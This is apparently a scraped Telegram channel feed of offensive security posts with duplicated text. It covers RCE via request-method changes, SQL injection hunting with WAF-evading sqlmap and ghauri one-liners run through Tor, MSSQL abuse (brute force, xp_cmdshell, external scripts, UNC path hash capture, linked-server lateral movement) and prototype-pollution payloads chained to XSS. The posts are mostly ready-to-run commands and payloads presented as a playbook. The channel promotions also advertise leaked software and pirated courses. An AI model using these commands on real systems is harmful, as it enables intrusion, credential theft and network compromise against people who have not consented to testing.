Changing HTTP Request Methods and Their Security Impact
When we send a GET request to a website like site.com, we usually receive an HTML page or another expected response.
But what happens if we change the request method to POST, PUT, or DELETE?
1-Rejecting the request and returning 405 Method Not Allowed.
2-Processing the request in an
unexpected way, potentially causing errors or data leaks.
3-In rare cases, this can lead to
severe security vulnerabilities, such as Remote Code Execution (RCE).
━━━━━━━━━━━━━━━━━━
Some web frameworks, like Laravel, return sensitive information when an error occurs, especially if debug mode is enabled. Changing the request method unexpectedly may trigger errors that expose:
•Database credentials.
•Environment variables.
•File paths and internal configurations.
In some cases, improper handling of user input can even lead to RCE vulnerabilities, allowing an attacker to execute commands on the server.
━━━━━━━━━━━━━━━━━━
Example 1: 405 Error When Changing Method
Trying to send a POST request to an endpoint that only allows GET:
The server might respond with:
Example 2: Internal Error Due to Unexpected Request
If a server encounters an error when
processing an unexpected request method, it might return:
In Laravel, if APP_DEBUG=true, it might expose sensitive details like:
This could reveal database credentials or configuration files.
Example 3: RCE Exploitation in Laravel
If an application uses eval() or system() with unsanitized user input, an attacker may be able to execute system commands by altering the request:
If the server is not properly filtering input, it may execute the whoami command and return the server's user name.
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
When we send a GET request to a website like site.com, we usually receive an HTML page or another expected response.
But what happens if we change the request method to POST, PUT, or DELETE?
This can lead to different reactions from the server, such as:
1-Rejecting the request and returning 405 Method Not Allowed.
2-Processing the request in an
unexpected way, potentially causing errors or data leaks.
3-In rare cases, this can lead to
severe security vulnerabilities, such as Remote Code Execution (RCE).
━━━━━━━━━━━━━━━━━━
Impact on Web Frameworks (e.g., Laravel)
Some web frameworks, like Laravel, return sensitive information when an error occurs, especially if debug mode is enabled. Changing the request method unexpectedly may trigger errors that expose:
•Database credentials.
•Environment variables.
•File paths and internal configurations.
In some cases, improper handling of user input can even lead to RCE vulnerabilities, allowing an attacker to execute commands on the server.
━━━━━━━━━━━━━━━━━━
Practical Examples
Example 1: 405 Error When Changing Method
Trying to send a POST request to an endpoint that only allows GET:
curl -X POST http://example.com/
The server might respond with:
HTTP/1.1 405 Method Not Allowed
Example 2: Internal Error Due to Unexpected Request
If a server encounters an error when
processing an unexpected request method, it might return:
HTTP/1.1 500 Internal Server Error
In Laravel, if APP_DEBUG=true, it might expose sensitive details like:
SQLSTATE[HY000] [1045] Access denied for user 'root'@'localhost'
This could reveal database credentials or configuration files.
Example 3: RCE Exploitation in Laravel
If an application uses eval() or system() with unsanitized user input, an attacker may be able to execute system commands by altering the request:
curl -X DELETE http://example.com/delete_user --data "id=1; system('whoami');"
If the server is not properly filtering input, it may execute the whoami command and return the server's user name.
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
👍5🔥2❤1
A Simple Yet Effective Way to Find SQLI Vulnerabilities
Sometimes, simple methods work best when hunting for SQL injection (SQLI) vulnerabilities. Here’s an optimized approach:
1. Extract Potential Targets
Use Wayback Machine URLs to find historical URLs with parameters:
waybackurls --dates target.com | grep '?id='
This helps identify pages that may still be vulnerable.
━━━━━━━━━━━━━━━━━━
2. Test for SQLI Sleep-Based Vulnerabilities
Use the following payload:
if(now()=sysdate(),SLEEP(8),0)
If the response is delayed by ~8 seconds, the parameter is likely injectable.
━━━━━━━━━━━━━━━━━━
3. Manual Testing with cURL
curl -X GET "https://target.com/page.php?id=1" --data-urlencode "id=1' OR if(now()=sysdate(),SLEEP(8),0) -- -" -H "X-Forwarded-For: 127.0.0.1"
•The X-Forwarded-For header may help bypass basic IP-based WAF restrictions.
•Modify headers like User-Agent to mimic real traffic.
━━━━━━━━━━━━━━━━━━
4. Automated Testing with Ghauri (Bypassing WAFs)
ghauri -u "https://target.com/page.php?id=1" --timeout=30 --delay=5 --technique=BEST --level=3 --prefix="/**/" --suffix="-- -" --safe-chars="[]" --random-agent --ignore-code=403
--timeout=30: Sets the request timeout to 30 seconds.
--delay=5: Adds a 5-second delay between requests to avoid detection.
--technique=BEST: Uses the most effective SQL injection techniques.
--level=3: Performs more advanced tests for better detection.
--prefix="/**/": Adds a comment prefix to bypass WAF filters.
--suffix="-- -": Ends the payload with a SQL comment to evade detection.
--safe-chars="[]": Prevents certain characters from being URL-encoded.
--random-agent: Uses a random User-Agent to avoid fingerprinting.
--ignore-code=403: Ignores 403 Forbidden responses to continue scanning.
━━━━━━━━━━━━━━━━━━
5. Advanced Testing with SQLMap
sqlmap -u "https://target.com/page.php?id=1" --batch --random-agent --tamper="between,space2comment,charencode" --timeout=15 --time-sec=8 --level=5 --risk=3
--random-agent: Uses random user-agents to avoid detection.
--tamper: Applies obfuscation techniques to evade WAFs.
--risk=3 --level=5: Enables deep scanning with advanced payloads.
━━━━━━━━━━━━━━━━━━
Conclusion
✅ Wayback Machine helps find old endpoints.
✅ Manual payloads help confirm basic SQL injection.
✅ Ghauri & SQLMap provide automation with WAF bypass techniques.
━━━━━━━━━━━━━━━━━━
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
Telegram
ExploitQuest
contact: @ExploitQuestbot
❤8👍2🔥1
Here is a more optimized one-liner for finding SQL injection vulnerabilities while bypassing WAF efficiently:
More aggressive alternative for bypassing WAF with Tor and Hex encoding:
Try it and see the results!
gau target.com | grep '=' | anew urls.txt | httpx -silent -status-code -mc 200 | awk '{print $1}' | xargs -I{} sqlmap -u "{}" --random-agent --tamper="between,space2comment,charencode" --level=5 --risk=3 --batch --threads=10 --time-sec=5More aggressive alternative for bypassing WAF with Tor and Hex encoding:
gau target.com | grep '=' | anew urls.txt | httpx -silent -status-code -mc 200 | awk '{print $1}' | xargs -I{} sqlmap -u "{}" --random-agent --tor --proxy="socks5://127.0.0.1:9050" --tamper="space2comment,charencode,randomcase" --hex --batch --threads=5 --timeout=10Try it and see the results!
👍6👏3
These commands and URLs are used for gathering and analyzing data about a specific domain (example.com in this case).
The goal is to identify exposed files, sensitive information, and security-related data. Here's a breakdown:
•This query retrieves all archived URLs of example.com from Wayback Machine.
•*.example.com/* searches for all subdomains and pages.
•collapse=urlkey removes duplicate URLs.
•output=text formats the output as
plain text.
•fl=original extracts only the original URLs without extra metadata.
━━━━━━━━━━━━━━━━━━
Explanation:
•Retrieves a security report for example.com from VirusTotal.
•This report includes:
Blacklist status
Malicious activities detected
Known associated malicious URLs
•Replace YOUR_API_KEY with a valid VirusTotal API key.
━━━━━━━━━━━━━━━━━━
Explanation:
•Queries AlienVault OTX for URLs associated with domain.com.
•limit=500 retrieves up to 500 URLs per page.
•page=1 fetches the first page of results.
━━━━━━━━━━━━━━━━━━
Explanation:
•Fetches all archived URLs of example.com from Wayback Machine.
•Saves the output to out.txt for further processing.
━━━━━━━━━━━━━━━━━━
Explanation:
1-cat out.txt → Reads the archived URLs from out.txt.
2-uro → Deduplicates and normalizes URLs.
3-grep -E → Uses regular expressions (regex) to extract potentially sensitive files, such as:
•Database files: .sql, .db, .backup
•Documents: .xls, .xlsx, .doc, .pdf, .txt
•Compressed archives: .zip, .tar.gz, .rar, .7z
•Encryption keys: .pem, .crt, .key, .asc
•Configuration files: .config, .ini, .yaml, .yml
•Executable files: .exe, .dll, .apk, .msi
━━━━━━━━━━━━━━━━━━
🔍 Summary:
These commands help in discovering and analyzing sensitive files that might be publicly accessible by:
1-Fetching archived URLs from Wayback Machine.
2-Checking for malicious activity on VirusTotal and AlienVault.
3-Filtering sensitive files using grep and uro.
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
The goal is to identify exposed files, sensitive information, and security-related data. Here's a breakdown:
1️⃣ Using Archive.org to Find Archived URLs
URL:
https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original
Explanation:
•This query retrieves all archived URLs of example.com from Wayback Machine.
•*.example.com/* searches for all subdomains and pages.
•collapse=urlkey removes duplicate URLs.
•output=text formats the output as
plain text.
•fl=original extracts only the original URLs without extra metadata.
━━━━━━━━━━━━━━━━━━
2️⃣ Using VirusTotal to Get a Domain Report
URL:
https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=example.com
Explanation:
•Retrieves a security report for example.com from VirusTotal.
•This report includes:
Blacklist status
Malicious activities detected
Known associated malicious URLs
•Replace YOUR_API_KEY with a valid VirusTotal API key.
━━━━━━━━━━━━━━━━━━
3️⃣ Using AlienVault OTX to Fetch URLs Related to a Domain
URL:
https://otx.alienvault.com/api/v1/indicators/hostname/domain.com/url_list?limit=500&page=1
Explanation:
•Queries AlienVault OTX for URLs associated with domain.com.
•limit=500 retrieves up to 500 URLs per page.
•page=1 fetches the first page of results.
━━━━━━━━━━━━━━━━━━
4️⃣ Using curl to Fetch Archived URLs and Save Them to a File
Command:
curl -G "https://web.archive.org/cdx/search/cdx" \
--data-urlencode "url=*.example.com/*" \
--data-urlencode "collapse=urlkey" \
--data-urlencode "output=text" \
--data-urlencode "fl=original" > out.txt
Explanation:
•Fetches all archived URLs of example.com from Wayback Machine.
•Saves the output to out.txt for further processing.
━━━━━━━━━━━━━━━━━━
5️⃣ Extracting Sensitive Files Using uro and grep
Command:
cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'
Explanation:
1-cat out.txt → Reads the archived URLs from out.txt.
2-uro → Deduplicates and normalizes URLs.
3-grep -E → Uses regular expressions (regex) to extract potentially sensitive files, such as:
•Database files: .sql, .db, .backup
•Documents: .xls, .xlsx, .doc, .pdf, .txt
•Compressed archives: .zip, .tar.gz, .rar, .7z
•Encryption keys: .pem, .crt, .key, .asc
•Configuration files: .config, .ini, .yaml, .yml
•Executable files: .exe, .dll, .apk, .msi
━━━━━━━━━━━━━━━━━━
🔍 Summary:
These commands help in discovering and analyzing sensitive files that might be publicly accessible by:
1-Fetching archived URLs from Wayback Machine.
2-Checking for malicious activity on VirusTotal and AlienVault.
3-Filtering sensitive files using grep and uro.
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
❤6👍5
🔹Microsoft SQL Server Abuse Techniques 🔹
👋 Hello, friends!
I often discuss Microsoft SQL Server (MSSQL) abuse in interviews, and surprisingly, many people have only a superficial understanding of it. However, MSSQL is widely used in corporate networks, and if misconfigured, it can become a valuable entry point for attackers.
In this post, I have gathered the main MSSQL abuse techniques to help you:
✅ Understand possible attack vectors.
✅ Prepare for interviews.
✅ Organize your knowledge.
━━━━━━━━━━━━━━━━━━
📖 MSSQL Basics
Microsoft SQL Server (MSSQL) is a relational database management system (DBMS) developed by Microsoft, commonly used in corporate environments for storing and processing data.
🔹 Main Components:
✅ Database Engine – Stores, processes, and manages data.
✅ SQL Server Agent – Automates tasks (e.g., backups).
✅ SQL Server Browser – Helps clients find MSSQL instances.
✅ SSIS (Integration Services) – Handles data integration.
✅ SSRS (Reporting Services) – Generates reports.
✅ SSAS (Analysis Services) – Provides analytics and data processing.
🔹 User Roles in MSSQL:
🔸 sysadmin – Full privileges on the server.
🔸 db_owner – Full rights within a specific database.
🔸 db_datareader – Read-only access.
🔸 db_datawriter – Ability to modify data.
🔸 public – Default role for all users (may have more permissions than expected).
🔹 Authentication Methods:
🔹 Windows Authentication – Uses NTLM/Kerberos for domain-based authentication.
🔹 SQL Authentication – Uses local MSSQL accounts (e.g., sa, custom user logins).
🔍 Detecting MSSQL on the Network
Before attacking, you must first locate MSSQL instances.
🔹 PowerUpSQL (PowerShell)
Get-SQLInstanceDomain
🔹 Nmap
nmap -p 1433 --script ms-sql-info <IP>
🔹 Metasploit
use auxiliary/scanner/mssql/mssql_ping
🔹 go-windapsearch
go-windapsearch -d domain.local -u Administrator -p 'password1111' -m custom --filter="(&(objectClass=computer)(servicePrincipalName=*MSSQLSvc/*))" --attrs cn,servicePrincipalName
🔑 Gaining Access to MSSQL
🔹 Brute Force Attack
hydra -L users.txt -P pass.txt <IP> mssql
netexec mssql <target-ip> -u username -p passwords.txt
━━━━━━━━━━━━━━━━━━
🚀 Privilege Escalation: Local Admin → Sysadmin
The main MSSQL process (sqlservr.exe) runs under a Windows account with limited privileges, but inside SQL Server, it is often assigned sysadmin by default. Compromising this service can lead to full domain control!
🔹 Step 1: Find Local MSSQL
Get-SQLInstanceLocal
🔹 Step 2: Impersonate SQL Service Accounts
Invoke-SQLImpersonateService -Verbose -Instance your_instance_name
🎯 Executing OS Commands via MSSQL
If an attacker gains access to MSSQL, they can execute Windows commands using:
🔹 CLR (Common Language Runtime) Assembly
Allows executing .NET code (C#, VB.NET) inside MSSQL.
Invoke-SQLOSCLR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"
🔹 OLE Automation Procedures
Allows running COM objects from T-SQL.
Invoke-SQLOSOle -Username sa -Password Pass123 -ServerInstance <IP> -Command "whoami"
🔹 xp_cmdshell (Built-in Stored Procedure)
Executes Windows commands directly from MSSQL.
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';
Invoke-SQLOSCmd -Username sa -Password sa -Instance your_instance_name -Command "whoami"
━━━━━━━━━━━━━━━━━━
🔚 Conclusion
MSSQL misconfigurations can lead to serious security risks, including:
⚠ Unauthorized access to databases.
⚠ Privilege escalation to sysadmin.
⚠ Remote code execution (RCE).
⚠ Lateral movement across corporate networks.
🔍 Understanding these techniques is essential for security professionals to prevent attacks and secure corporate environments. Stay safe! 🚀
[https://t.me/ExploitQuest]
#CyberSecurity #MSSQL #EthicalHacking
Telegram
ExploitQuest
contact: @ExploitQuestbot
👍8🔥5
MSSQL Exploitation Techniques
🔹 External Scripts (Python/R) – Allows executing Python & R code in Microsoft SQL Server.
PowerUpSQL Commands:
🔹 UNC Path Injection – Extracts NetNTLM hashes via SMB.
PowerUpSQL Command:
🔹 Lateral Movement via Linked Servers
Linked Servers allow connections to other SQL Servers, MySQL, Oracle, PostgreSQL, and more.
PowerUpSQL Commands:
#RedTeam #MSSQL #BugBounty #CyberSecurity
🔹 External Scripts (Python/R) – Allows executing Python & R code in Microsoft SQL Server.
-- Execute Python script
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
-- Execute R script
EXEC sp_execute_external_script
@language=N'R',
@script=N'OutputDataSet <- data.frame(system("cmd.exe /c whoami",intern=T))'
WITH RESULT SETS (([cmd_out] text));
PowerUpSQL Commands:
# Remote Execution
Invoke-SQLOSCmdPython -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"
Invoke-SQLOSCmdR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"
# Local Execution
Get-SQLInstanceLocal | Invoke-SQLOSCmdPython -Verbose -Command "whoami"
Get-SQLInstanceLocal | Invoke-SQLOSCmdR -Verbose -Command "whoami"
🔹 UNC Path Injection – Extracts NetNTLM hashes via SMB.
EXEC xp_cmdshell 'net use Z:\\YOUR_IP\share';
PowerUpSQL Command:
Invoke-SQLUncPathInjection -Verbose -CaptureIp YourResponderHost
🔹 Lateral Movement via Linked Servers
Linked Servers allow connections to other SQL Servers, MySQL, Oracle, PostgreSQL, and more.
-- List Linked Servers
EXEC sp_linkedservers;
-- Execute command on remote server
EXEC ('whoami') AT [LINKED_SERVER];
PowerUpSQL Commands:
# Find linked servers
Get-SQLServerLink -Instance YourInstance -Verbose
# Check privileges on remote server
Get-SQLServerLinkCrawl -Instance YourInstance -Verbose
# Enable xp_cmdshell on linked server
Get-SQLServerLinkCrawl -Instance YourInstance -Query "EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT YOUR_LINKED_SERVER"
🔥 That's all, friends!
Happy hacking and see you next time! 🚀
#RedTeam #MSSQL #BugBounty #CyberSecurity
👍5❤4🤯3
Prototype Pollution Vulnerability
Prototype Pollution is a security vulnerability in JavaScript that allows an attacker to add arbitrary properties to the prototype (the root object) of a general object. This enables an attacker to modify object properties that would typically be inaccessible.
However, this vulnerability alone is not always exploitable. To increase its impact, an attacker often combines it with other vulnerabilities like Cross-Site Scripting (XSS) to execute malicious actions.
━━━━━━━━━━━━━━━━━━
Understanding JavaScript Object Prototypes
In JavaScript, everything is an object. An object is essentially a collection of key-value pairs where values can be of any data type, such as boolean, string, integer, etc.
Creating an object in JavaScript is simple:
To access properties of this object, we can use two methods:
1-Dot notation:
Bracket notation:
One of these methods is used for polluting the prototype of an object.
━━━━━━━━━━━━━━━━━━
How Prototype Pollution Works
When a property of an object is accessed, the JavaScript engine first looks for it inside the object itself.
•If the property does not exist in the object, JavaScript traverses up the prototype chain to find it in the parent prototype.
To better understand this, open the browser Console and create an object. JavaScript will automatically connect it to one of the built-in prototypes based on its type.
Example:
Since "Arya" is a string, it inherits all properties from JavaScript's String prototype.
Using dot notation or bracket notation, we can see various inherited properties that were not explicitly defined.
Moreover, we can manually reference an object's prototype using:
If an attacker overwrites a property in a prototype that is being used in the frontend or backend of a web application, it can lead to serious security issues.
━━━━━━━━━━━━━━━━━━
Testing for Prototype Pollution
To test for Prototype Pollution, modify the URL as follows and send a request:
1️⃣ Dot Notation Approach
2️⃣ Bracket Notation Approach
Bypassing WAF (Web Application Firewall)
If the WAF blocks the proto keyword, we can use constructor-based techniques:
If the WAF still blocks requests, we can use nested obfuscation techniques:
Confirming
the Vulnerability
To check if the property was successfully polluted, create an empty object in the browser console and try accessing the polluted property:
If the property value appears, the Prototype Pollution vulnerability exists on the target system.
━━━━━━━━━━━━━━━━━━
[https://t.me/ExploitQuest]
#CyberSecurity #MSSQL #EthicalHacking
#PrototypePollution
#JavaScriptSecurity
#WebSecurity
#BugBounty
#EthicalHacking
#CyberSecurity
#SecurityResearch
#WebHacking
Prototype Pollution is a security vulnerability in JavaScript that allows an attacker to add arbitrary properties to the prototype (the root object) of a general object. This enables an attacker to modify object properties that would typically be inaccessible.
However, this vulnerability alone is not always exploitable. To increase its impact, an attacker often combines it with other vulnerabilities like Cross-Site Scripting (XSS) to execute malicious actions.
━━━━━━━━━━━━━━━━━━
Understanding JavaScript Object Prototypes
In JavaScript, everything is an object. An object is essentially a collection of key-value pairs where values can be of any data type, such as boolean, string, integer, etc.
Creating an object in JavaScript is simple:
let userInfo = {
"username": "admin",
"password": "1qaz2wsx3edc",
"email": "admin@victim.com"
};To access properties of this object, we can use two methods:
1-Dot notation:
userInfo.username;
Bracket notation:
userInfo["username"];
One of these methods is used for polluting the prototype of an object.
━━━━━━━━━━━━━━━━━━
How Prototype Pollution Works
When a property of an object is accessed, the JavaScript engine first looks for it inside the object itself.
•If the property does not exist in the object, JavaScript traverses up the prototype chain to find it in the parent prototype.
To better understand this, open the browser Console and create an object. JavaScript will automatically connect it to one of the built-in prototypes based on its type.
Example:
var name = "Arya";
console.log(name.proto);
Since "Arya" is a string, it inherits all properties from JavaScript's String prototype.
Using dot notation or bracket notation, we can see various inherited properties that were not explicitly defined.
Moreover, we can manually reference an object's prototype using:
a.proto;ploiting Prototype Pollution
Ex
If an attacker overwrites a property in a prototype that is being used in the frontend or backend of a web application, it can lead to serious security issues.
━━━━━━━━━━━━━━━━━━
Testing for Prototype Pollution
To test for Prototype Pollution, modify the URL as follows and send a request:
1️⃣ Dot Notation Approach
http://target.com/?proto.arya=arya
2️⃣ Bracket Notation Approach
http://target.com/?proto[arya]=arya
Bypassing WAF (Web Application Firewall)
If the WAF blocks the proto keyword, we can use constructor-based techniques:
/?constructor.prototype.arya=arya
/?constructor[prototype][arya]=arya
If the WAF still blocks requests, we can use nested obfuscation techniques:
/?proprototo[arya]=arya
/?proprototo.arya=arya
/?constconstructorructor[protoprototypetype][arya]=arya
/?constconstructorructor.protoprototypetype.arya=arya
Confirming
the Vulnerability
To check if the property was successfully polluted, create an empty object in the browser console and try accessing the polluted property:
let test = {};
console.log(test.arya); // Output: " arya"
If the property value appears, the Prototype Pollution vulnerability exists on the target system.
━━━━━━━━━━━━━━━━━━
Conclusion
Prototype Pollution is a powerful vulnerability that, when combined with other exploits, can lead to serious security risks. Understanding how JavaScript's prototype system works is essential for both attackers and defenders to identify and mitigate such threats effectively.
[https://t.me/ExploitQuest]
#CyberSecurity #MSSQL #EthicalHacking
#PrototypePollution
#JavaScriptSecurity
#WebSecurity
#BugBounty
#EthicalHacking
#CyberSecurity
#SecurityResearch
#WebHacking
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
❤7👍6🔥4
أهلاً وسهلاً بكم جميعاً،
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.
@end_k
@GlobalRedHat
@k7ali_linux
@ExploitQuest
@iiMrDark
@Wa3i_Tech
@codearabs
@darkcsc
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.
@end_k
قناتنا المشتركة والتي تحتوي على بثوث مباشرة ومحتوى مميز وغير مسبوق.@iiLinux
قناة عامة تقوم بنشر التقنيات العامة و تتميز بشروحات لينكس.
@GlobalRedHat
المجتمع الرسمي للقراصنة ذوي القبعة الحمراء.
@k7ali_linux
قناة تخص شروحات كالي لينكس بشكل مختلف ومتميز.
@ExploitQuest
قناة تهتم باكتشاف الثغرات و استغلالها بالإضافة إلى الشروحات المميزة فيها.@EgyptianshieldTOOLS
قناة خاصة بالأدوات المستخدمة في البرمجة والأمن السيبراني.
@iiMrDark
قناة تقدم محتوى خاص بالتسريبات والبرامج.
@Wa3i_Tech
قناة تقدم الوعي في الأمن السيبراني وشروحات مبسطة.
@codearabs
قناة مختصة بتسريب كورسات الشركات المشهورة في المجالات التقنية.@Egyshield
قناة مختصة بالشروحات والأخبار التقنية وتحديداً في البرمجة والأمن السيبراني.@Bad_Rabbit_Team
قناة Bad Rabbit – قناة متخصصة في الهجمات السيبرانية، تقدم شروحات عملية عن اختبار الاختراق، تحليل الثغرات، وأدوات الهجوم الإلكتروني.@GlobalRedTeam
المجتمع الرسمي لـGlobal Red Team
@darkcsc
قناة خاصة بعلم الحاسوب وتحتوي على شروحات تخص الحاسوب بشكل عام.
👍4❤2
ExploitQuest
Prototype Pollution Vulnerability Prototype Pollution is a security vulnerability in JavaScript that allows an attacker to add arbitrary properties to the prototype (the root object) of a general object. This enables an attacker to modify object properties…
A Real-World Example of Prototype Pollution Exploitation
A hacker was testing a target and noticed that it didn’t properly validate user inputs, allowing multiple XSS vulnerabilities. This led them to wonder if they could directly manipulate the Prototype via the URL.
To test for Prototype Pollution, they started with the following request:
https://target.com/?proto.arya=arya
However, the WAF (Web Application Firewall) blocked this attempt.
To bypass it, they got creative and modified the payload:
https://target.com/?proprototo.arya=arya
To confirm if the vulnerability was present, they opened the browser console and created an empty object:
test = {};
test.arya; // Outputs: "arya"Since the property (arya) was successfully injected into the object, Prototype Pollution was confirmed!
But Prototype Pollution alone has no significant impact, so they needed to chain it with another vulnerability—like XSS—to escalate the attack.
━━━━━━━━━━━━━━━━━━
Leveraging Web Archives for Further Exploitation
While analyzing the target’s Web Archive, the hacker noticed many URLs contained # followed by useful information.
Reminder:
Everything after # in a URL is not sent to the server but is processed directly by the DOM, meaning the WAF won’t block it!
The hacker decided to test this method:
https://target.com/#proto.arya=arya
By following the same console-based verification, they confirmed the attack worked.
━━━━━━━━━━━━━━━━━━
Turning Prototype Pollution into
XSS
Through behavior analysis, they discovered that injected values were being inserted into the style attribute of HTML elements.
Now, they could escalate this attack by chaining Prototype Pollution with XSS:
https://target.com/#proto[onload]=alert(1)
━━━━━━━━━━━━━━━━━━
Prototype Pollution - Server Side
Prototype Pollution isn’t just a client-side issue—it can also be exploited on the server side.
If a Node.js server uses libraries that improperly merge user input into objects (e.g., lodash, merge, deepExtend, setValue), it becomes vulnerable!
Example of a Vulnerable Node.js Code
const _ = require('lodash');
const express = require('express');
const app = express();
app.use(express.json());
app.post('/update', (req, res) => {
let defaultConfig = { role: 'user' };
let userConfig = req.body;
let finalConfig = _.merge({}, defaultConfig, userConfig);
res.json(finalConfig);
});
app.listen(3000, () => console.log("Server running on port 3000")); Where’s the Problem?
The function _.merge() merges user input with the defaultConfig object.
If an attacker sends a payload with proto, they can modify the prototype of all objects in the application!
━━━━━━━━━━━━━━━━━━
Attack Scenario (Exploiting the
Above Code)
The hacker discovers an API endpoint /update that sets user roles.
They send the following malicious request:
POST /update HTTP/1.1
Host: target.com
Content-Type: application/json
{
"proto": { "isAdmin":
true }
}
What Happens?
Since proto affects Object.prototype, every new object created in the application will automatically have isAdmin = true!
Conclusion
Prototype Pollution is a serious vulnerability that can be exploited both client-side and server-side.
When combined with other vulnerabilities (like XSS, RCE, or privilege escalation), it can have a critical impact.
Developers should use secure coding practices and avoid unsafe object merging in applications.
[https://t.me/ExploitQuest]
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
❤7👍6🔥4🤯1
Forwarded from s4rrar
أهلاً وسهلاً بكم جميعاً،
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.
@end_k
@GlobalRedHat
@k7ali_linux
@ExploitQuest
@iiMrDark
@Wa3i_Tech
@codearabs
@darkcsc
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.
@end_k
قناتنا المشتركة والتي تحتوي على بثوث مباشرة ومحتوى مميز وغير مسبوق.@iiLinux
قناة عامة تقوم بنشر التقنيات العامة و تتميز بشروحات لينكس.
@GlobalRedHat
المجتمع الرسمي للقراصنة ذوي القبعة الحمراء.
@k7ali_linux
قناة تخص شروحات كالي لينكس بشكل مختلف ومتميز.
@ExploitQuest
قناة تهتم باكتشاف الثغرات و استغلالها بالإضافة إلى الشروحات المميزة فيها.@EgyptianshieldTOOLS
قناة خاصة بالأدوات المستخدمة في البرمجة والأمن السيبراني.
@iiMrDark
قناة تقدم محتوى خاص بالتسريبات والبرامج.
@Wa3i_Tech
قناة تقدم الوعي في الأمن السيبراني وشروحات مبسطة.
@codearabs
قناة مختصة بتسريب كورسات الشركات المشهورة في المجالات التقنية.@Egyshield
قناة مختصة بالشروحات والأخبار التقنية وتحديداً في البرمجة والأمن السيبراني.@Bad_Rabbit_Team
قناة Bad Rabbit – قناة متخصصة في الهجمات السيبرانية، تقدم شروحات عملية عن اختبار الاختراق، تحليل الثغرات، وأدوات الهجوم الإلكتروني.@GlobalRedTeam
المجتمع الرسمي لـGlobal Red Team
@darkcsc
قناة خاصة بعلم الحاسوب وتحتوي على شروحات تخص الحاسوب بشكل عام.
👍6👏1
Forwarded from s4rrar
أهلاً وسهلاً بكم جميعاً،
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.
@end_k
@GlobalRedHat
@k7ali_linux
@ExploitQuest
@iiMrDark
@Wa3i_Tech
@codearabs
@darkcsc
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.
@end_k
قناتنا المشتركة والتي تحتوي على بثوث مباشرة ومحتوى مميز وغير مسبوق.@iiLinux
قناة عامة تقوم بنشر التقنيات العامة و تتميز بشروحات لينكس.
@GlobalRedHat
المجتمع الرسمي للقراصنة ذوي القبعة الحمراء.
@k7ali_linux
قناة تخص شروحات كالي لينكس بشكل مختلف ومتميز.
@ExploitQuest
قناة تهتم باكتشاف الثغرات و استغلالها بالإضافة إلى الشروحات المميزة فيها.@EgyptianshieldTOOLS
قناة خاصة بالأدوات المستخدمة في البرمجة والأمن السيبراني.
@iiMrDark
قناة تقدم محتوى خاص بالتسريبات والبرامج.
@Wa3i_Tech
قناة تقدم الوعي في الأمن السيبراني وشروحات مبسطة.
@codearabs
قناة مختصة بتسريب كورسات الشركات المشهورة في المجالات التقنية.@Egyshield
قناة مختصة بالشروحات والأخبار التقنية وتحديداً في البرمجة والأمن السيبراني.@Bad_Rabbit_Team
قناة Bad Rabbit – قناة متخصصة في الهجمات السيبرانية، تقدم شروحات عملية عن اختبار الاختراق، تحليل الثغرات، وأدوات الهجوم الإلكتروني.@GlobalRedTeam
المجتمع الرسمي لـGlobal Red Team
@darkcsc
قناة خاصة بعلم الحاسوب وتحتوي على شروحات تخص الحاسوب بشكل عام.
❤2
أهلاً وسهلاً بكم جميعاً،
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.
https://t.me/addlist/nD70sWRf83U4ZTA0
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.
https://t.me/addlist/nD70sWRf83U4ZTA0
Telegram
Meow ~ Onion
s4rrar invites you to add the folder “Meow ~ Onion”, which includes 10 chats.
ExploitQuest
